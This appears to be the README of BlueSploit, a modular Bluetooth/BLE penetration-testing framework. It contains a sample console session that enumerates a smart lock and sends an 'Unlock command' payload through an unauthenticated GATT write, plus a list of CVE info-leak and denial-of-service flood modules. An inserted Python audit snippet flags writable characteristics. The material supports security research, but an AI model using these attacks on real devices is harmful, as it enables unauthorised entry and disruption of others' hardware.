Bluetooth Exploitation Framework
A Metasploit-style modular framework for Bluetooth Classic and BLE security testing.
I started building this with a purpose. Since it's an early version, there may be stability issues and false positives. I'm still working on it, so please be patient.
- Device Discovery - Scan for nearby BLE and Classic Bluetooth devices
- GATT Enumeration - Enumerate services, characteristics, and descriptors
- Exploit Modules - Ready-to-use exploits for common vulnerabilities
- Credential Testing - Test for default/weak PINs and pairing vulnerabilities
- Modular Architecture - Easy to extend with custom modules
- Result Export - Save scan results and loot to JSON
# Clone the repository
git clone https://github.com/v33ru/bluesploit.git
cd bluesploit
# Create a Python virtual environment
python3 -m venv env
source env/bin/activate
# Install dependencies
pip install -r requirements.txt
# Run BlueSploit
python bluesploit.py
- Python 3.10+
- Bluetooth adapter (built-in or USB dongle)
- Linux: BlueZ stack installed
- macOS: Works out of the box
- Windows: Requires Windows 10+ with BLE support
$ python bluesploit.py

  BlueSploit - Bluetooth Exploitation Framework v1.0.0

  Author    : v33ru / Mr-IoT
  Community : IoT Security Research Group (IOTSRG)
  GitHub    : https://github.com/v33ru

  [+] BLE Scanning & Enumeration    [+] GATT Service Analysis
  [+] Bluetooth Classic Attacks     [+] Vulnerability Detection
  [+] Exploitation Modules          [+] Protocol Reverse Engineering

  Type 'help' for commands    Type 'show modules' to list modules
bluesploit > help
Core Commands
=============
use <module> Load a module
back Unload current module
search <keyword> Search for modules
show <type> Show modules/options
Module Commands
===============
set <opt> <val> Set module option
unset <option> Clear module option
options Show module options
info Show module info
run / exploit Execute module
check Check if vulnerable
Utility Commands
================
clear Clear screen
reload Reload modules
setg <opt> <val> Set global option
banner Show banner
exit / quit Exit BlueSploit
bluesploit > use scanners/ble/discovery
bluesploit (scanners/ble/discovery) > set timeout 15
bluesploit (scanners/ble/discovery) > run
[*] Scanning for BLE devices (15s)...
[+] AA:BB:CC:DD:EE:FF - Smart Lock [-45 dBm] [Nordic Semiconductor]
[+] 11:22:33:44:55:66 - MI Band 7 [-62 dBm] [Xiaomi]
[+] Found 2 devices
bluesploit > use scanners/ble/gatt_enum
bluesploit (scanners/ble/gatt_enum) > set target AA:BB:CC:DD:EE:FF
bluesploit (scanners/ble/gatt_enum) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[*] Enumerating GATT services...
[Service] 00001800-0000-1000-8000-00805f9b34fb
    Generic Access (Handle: 0x0001)
    └── [Char] 00002a00-0000-1000-8000-00805f9b34fb
        │   Device Name
        │   Properties: read
        │   Value: Smart Lock
[Service] 0000fee0-0000-1000-8000-00805f9b34fb
    Custom Service (Handle: 0x0010)
    └── [Char] 0000fee1-0000-1000-8000-00805f9b34fb  ⚠ VULN
        │   Properties: write-without-response, notify
        │   ⚠ UNAUTH_WRITE_POSSIBLE: Write-without-response enabled
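As an added example (not part of BlueSploit or its gatt_enum module), the Python below parses a constructed enumeration dump in the format shown above and applies the same property-based check: a characteristic advertising write-without-response gets the tool's UNAUTH_WRITE_POSSIBLE label. Plain `write` is reported as a separate WRITABLE class, which is my own distinction, and the comments note why either finding still needs confirming against the ATT error the device actually returns.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the gatt_enum output format (not captured from a real device).
SAMPLE_DUMP = """\
[Service] 00001800-0000-1000-8000-00805f9b34fb
    Generic Access (Handle: 0x0001)
    └── [Char] 00002a00-0000-1000-8000-00805f9b34fb
        │   Properties: read
        │   Value: Smart Lock
[Service] 0000fee0-0000-1000-8000-00805f9b34fb
    Custom Service (Handle: 0x0010)
    └── [Char] 0000fee1-0000-1000-8000-00805f9b34fb
        │   Properties: write-without-response, notify
    └── [Char] 0000fee2-0000-1000-8000-00805f9b34fb
        │   Properties: read, write, indicate
"""

TREE_PREFIX = re.compile(r"^[\s│├└─|+-]+")  # tree-drawing characters before the payload
WRITE_PROPS = {"write", "write-without-response"}

@dataclass
class Characteristic:
    uuid: str
    service: str
    properties: list = field(default_factory=list)

def parse_gatt_dump(text):
    """Turn enumeration text into Characteristic records tagged with their owning service."""
    chars, service = [], None
    for raw in text.splitlines():
        line = TREE_PREFIX.sub("", raw).strip()
        if line.startswith("[Service]"):
            service = line.split()[1].lower()
        elif line.startswith("[Char]"):
            chars.append(Characteristic(line.split()[1].lower(), service))
        elif line.startswith("Properties:") and chars:
            chars[-1].properties = [p.strip() for p in line[len("Properties:"):].split(",")]
    return chars

def audit_writes(chars):
    """Return (uuid, label, write_props) for each characteristic the server accepts writes to.

    The property bits only say the peripheral accepts writes; whether it also requires an
    encrypted or authenticated link is learned from the ATT error returned on an attempt,
    so every finding is a candidate to verify, not proof (a source of false positives)."""
    findings = []
    for c in chars:
        props = WRITE_PROPS & set(c.properties)
        if "write-without-response" in props:
            findings.append((c.uuid, "UNAUTH_WRITE_POSSIBLE", sorted(props)))
        elif props:
            findings.append((c.uuid, "WRITABLE", sorted(props)))
    return findings
```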
bluesploit > use exploits/ble/unauth_write
bluesploit (exploits/ble/unauth_write) > set target AA:BB:CC:DD:EE:FF
bluesploit (exploits/ble/unauth_write) > set char_uuid 0000fee1-0000-1000-8000-00805f9b34fb
bluesploit (exploits/ble/unauth_write) > set payload 0601 # Unlock command
bluesploit (exploits/ble/unauth_write) > check
[*] Checking AA:BB:CC:DD:EE:FF for vulnerability...
[+] Found characteristic: 0000fee1-0000-1000-8000-00805f9b34fb
[+] VULNERABLE: Write-without-response enabled!
bluesploit (exploits/ble/unauth_write) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[+] Payload delivered!
modules/
├── scanners/                        # Discovery & enumeration
│   ├── ble/
│   │   ├── discovery.py             # BLE device discovery
│   │   └── gatt_enum.py             # GATT service + characteristic enumeration
│   └── classic/
│       └── sdp_enum.py              # Classic SDP service discovery
│
└── exploits/                        # Exploits + attack modules
    ├── ble/
    │   └── unauth_write.py          # BLE unauthenticated GATT write
    │
    ├── classic/
    │   ├── blueborne_leak.py        # CVE-2017-0781 info leak
    │   └── bnep_heap_disclosure.py  # CVE-2017-13258 heap disclosure
    │
    └── dos/
        ├── ble/
        │   └── notify_flood.py      # BLE notification / GATT flood
        └── classic/
            ├── l2ping_dos.py        # L2CAP ping flood
            ├── bluesmack.py         # L2CAP echo flood (large packets)
            ├── sdp_flood.py         # SDP query flood
            └── rfcomm_flood.py      # RFCOMM connection exhaustion
Contributions are welcome! Please feel free to submit a Pull Request.
- Fork the repository
- Create your feature branch (git checkout -b feature/new-module)
- Commit your changes (git commit -am 'Add new module')
- Push to the branch (git push origin feature/new-module)
- Open a Pull Request
- Bluetooth Classic support (BR/EDR)
- PIN bruteforce module
- BTSnoop log analyzer (GhostWrite integration)
- Replay attack module
- Database for session/loot storage
- Ubertooth integration
- BTLEJuice integration
- Inspired by RouterSploit and Metasploit
- Built with Bleak for cross-platform BLE support
- Thanks to the Bluetooth security research community
